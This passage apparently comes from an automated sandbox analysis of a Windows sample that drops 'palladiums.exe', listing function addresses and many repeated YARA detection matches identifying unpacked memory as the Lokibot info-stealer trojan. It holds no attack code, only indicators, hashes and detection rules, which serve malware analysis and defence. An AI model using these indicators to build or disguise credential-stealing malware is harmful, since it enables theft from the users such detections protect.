                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 24_2_012D3EA024_2_012D3EA0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 25_2_0132438825_2_01324388
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 26_2_01604A1826_2_01604A18
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 27_2_017B3E0827_2_017B3E08
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 28_2_00D733B028_2_00D733B0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 29_2_01D4DEC029_2_01D4DEC0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 30_2_01577CD830_2_01577CD8
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 31_2_00DA3F4831_2_00DA3F48
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 32_2_0134430032_2_01344300
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 33_2_01813EA033_2_01813EA0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 34_2_00C9459834_2_00C94598
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 35_2_0141430835_2_01414308
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 36_2_017B4AA036_2_017B4AA0
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: 37_2_0094548037_2_00945480
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: String function: 00719CB3 appears 31 times
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: String function: 00730A30 appears 46 times
                Source: C:\Users\user\Desktop\9876567899.bat.exeCode function: String function: 0072F9F2 appears 40 times
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: String function: 0004F9F2 appears 40 times
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: String function: 00039CB3 appears 31 times
                Source: C:\Users\user\AppData\Local\preinhered\palladiums.exeCode function: String function: 00050A30 appears 46 times
                Source: C:\Users\user\AppData\Roaming\Dhy2kmz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7064 -s 996
                Source: 9876567899.bat.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 14.2.palladiums.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 26.2.palladiums.exe.1540000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 28.2.palladiums.exe.31e0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 36.2.palladiums.exe.2010000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 9.2.palladiums.exe.e30000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 20.2.palladiums.exe.3cf0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 29.2.palladiums.exe.4130000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 31.2.palladiums.exe.1a60000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 35.2.palladiums.exe.1340000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 25.2.palladiums.exe.11b0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 21.2.palladiums.exe.3b50000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 12.2.palladiums.exe.1b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 24.2.palladiums.exe.3a80000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 30.2.palladiums.exe.38b0000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 18.2.palladiums.exe.f20000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 16.2.palladiums.exe.1570000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 17.2.palladiums.exe.1830000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
